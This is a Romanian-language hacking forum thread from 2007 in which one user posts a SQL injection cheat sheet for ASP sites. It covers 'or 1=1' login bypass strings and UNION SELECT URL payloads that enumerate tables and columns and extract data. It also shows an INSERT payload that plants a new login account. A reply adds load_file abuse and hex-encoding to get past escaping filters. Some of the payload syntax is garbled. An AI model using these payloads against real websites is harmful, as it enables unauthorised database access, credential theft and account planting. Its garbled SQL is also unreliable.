Dark-k-nowledge Posted November 20, 2007 Report Posted November 20, 2007 `logare ca prima persoana in baza de date sql`--text box--login: hi' or 1=1--pass: hi'or 1=1----bara url--http://site/index.asp?id=hi' or 1=1--Nota: Poti inlocui unde e 1 cu a sau 0 etc.'primirea numelor tabelelor'--text box--UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES----url bar--UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--http://site/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--'pt a primi numele coloanelor'--text box--UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--Nota: inlocuiti '"tablename text cu numele tabelului care il vreti...--url bar--http://site/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--'retreive getting data from table'--text box--UNION SELECT TOP 1 table_name FROM column_name--Nota : inlocuiti table_name cu numele tabelului si column name cu numele coloanei...--url bar--http://site/index.asp?id=10 UNION SELECT TOP 1 table_name FROM column_name--'Introducerea de date in baza de date'INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)--Nota: inlocuiti login_id,Login_name, and password cu numele coloanelor, inlocuiti table_name cu numele tabelului si valorile 111,name,pass cu orice vreti dar sa corespunda in ordinea coloanelor.--url bar--http://site/index.asp?id=10 INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)-- Quote
michee Posted November 21, 2007 Report Posted November 21, 2007 Ar mai fi cate ceva de baza:1) Functia load_file desi tre sa ai FILE_PRIV2) unde ai table_name='nume_tabela' e mai bine sa pui numele tabelei in hexa ptr ca de obicei se foloseste mysql_real_escape string si nu-ti mai merge......in hexa insa e ok:) Quote
